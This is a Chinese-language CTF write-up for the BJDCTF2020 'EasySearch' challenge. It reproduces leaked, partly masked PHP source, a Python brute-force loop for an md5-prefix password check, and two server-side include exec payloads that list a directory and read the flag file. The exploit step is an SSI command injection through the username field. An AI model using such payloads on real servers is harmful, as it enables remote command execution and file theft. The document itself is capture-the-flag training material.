[BJDCTF2020]EasySearch
扫网站后台,buu常常扫不出来算了,直接从网上扒一个
发现有/index.php.swp
源码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| <?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
|
需要密码前六位md5值等于6d0bc1
借助脚本
1
2
3
4
5
6
| from hashlib import md5
for i in range(10000000):
if md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1':
print(i)
|
随便选一个 2020666
1
| /public/6a55805e27f57db992ebd9b47735c84cb7ec8e91.shtml
|
看到这里大概率是ssti 但是抓包看既不是python也不是php 所以不会了
看了wp 才发现是没见过的shtml
其实在源码中也有稍微提示
第17行$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
直接用payload
payload:
flag在上层目录
1
2
| <!--#exec cmd="ls ../"-->
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->
|
